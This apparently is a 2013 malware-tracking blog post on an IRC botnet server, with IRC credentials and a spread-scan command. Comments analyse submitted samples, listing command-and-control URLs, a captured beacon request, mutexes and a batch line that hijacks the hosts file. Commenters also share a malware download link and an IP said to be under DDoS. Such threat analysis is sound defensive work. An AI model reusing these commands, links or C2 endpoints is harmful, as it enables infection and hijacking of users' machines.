were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

Thanks to anonymous guy in this post for the sample

Resolved : [were.hacked.jp] To [176.31.123.56]

Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x

sample here

hosting infos:
http://whois.domaintools.com/176.31.123.56

Categories: Uncategorized

15 Comments

Anonymous - May 6, 2013 at 9:26 pm

Here's the "anonymous guy" ip: 190.141.136.71, he's being ddosed for a month.

Anonymous - May 7, 2013 at 4:31 am

Hello pig, just wondering where do you get your maleware from?

Where do you search?

Pig - May 7, 2013 at 3:52 pm

1 month ddos for panama ip ? u must be raged to death lool

Anonymous - May 7, 2013 at 7:35 pm

the sample is deleted can you upload again

Anonymous - May 8, 2013 at 3:19 am

Anonymous - May 8, 2013 at 12:32 pm

http://www.sendspace.com/file/w8lb9m

samples_for_pig

http bot i think communicates to random shitted domains.
kinda advanced i think 😀

Anonymous - May 8, 2013 at 2:27 pm

Pig - May 8, 2013 at 4:26 pm

txx.exe connects here :hxxp://71.236.243.21:3128/G@t3/1nPu7.php

POST /G@t3/1nPu7.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: 71.236.243.21:3128
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache

'x0ex93xafxc0x12xx1c7`x95x9d3^xcfxd6Cxa3x8e;xbbx8ex05
x85x05*xeb`,x1fx8aex00xb0-xc8A<Ex8exeexe4xd7i<Oxa9tZ|x06xcexc8Ux8cxb7Wxd9!Nxd7Kn7x1axcbxf9'@x87x9d
xdf8$&xf2s~ixb3cxb3xf5!x16a(Z kx1d(, Rxe6x85 xdexc3x1bx7fxddxf4x0exc9Kx1f'xed)WxcePx8675Gxa7x04jx7fxe2x8c*B4xddJx1fx87x0fGx85xaf6xa7Y;xd5xd2x184xb1xb7_,pxcaesxb3Hxcfxeexff=x035x8d*x9axc8xd8xaaf|Hxfdx99xabw5x14Qx01xb3xecxf8xf6xa3&xcdxdcxfb
-xafxe2x032xe6x89xa2$x96xc1bxfaxd7
x05Vx15x00\xbexf9xfex9dcaXx80ox84x08xf1xf2x14:
xadxad_5xcbxe9/x8dx96
n($Qx08xdeu3sx91xb4Gwxdd5`xfdx98xae$xfex81x92,xfbxf5#O

Download URLs
hxxp://71.236.243.21/G@t3/j.bin theyre not active now
Outgoing connection to remote server: 71.236.243.21 TCP port 3128

Pig - May 8, 2013 at 4:35 pm

helpxx.exe is a sfx archive with 2 files inside host.bat and winhelp.exe

host.bat:echo 212.114.160.122 inf0nix.com >> %Systemroot%system32driversetchosts
winhelp.exe: connects to hxxp://inf0nix.com/notify.php

Pig - May 8, 2013 at 4:55 pm

this is the domain name for fU1.exe files.g00n.pl the rest are random domain names created by the malware like this http://www.bpfq02.com/www.inform1ongung.info

the http query is this :files.g00n.pl/dev/ip.php
this is the mutex name for this malware:_kuku_joker_v4.00

Pig - May 8, 2013 at 5:05 pm

fsvchost.exe does this:Copies self to other locations
Creates files in windows system directory
Creates system services or drivers
Load system drivers

Mutex created still same:_kuku_joker_v4.00

HTTP Queries:inf1nix.com GET /notify.php HTTP/1.1
http://www.bpfq02.com GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1
http://www.inform1ongung.info GET /t_100_v400/?rnd=252937&id=23104616288 HTTP/1.1

this is the malware version :User-Agent: KUKU v4.00 alpha

malware disables safeboot

new domain name here:inf1nix.com

Pig - May 8, 2013 at 5:09 pm

svchost-x.exe is same shit as txx.exe

Pig - May 8, 2013 at 5:09 pm

thank you for your submitions 🙂

Anonymous - May 8, 2013 at 5:29 pm

what is this bot btw?

Anonymous - May 8, 2013 at 6:51 pm

Comments are closed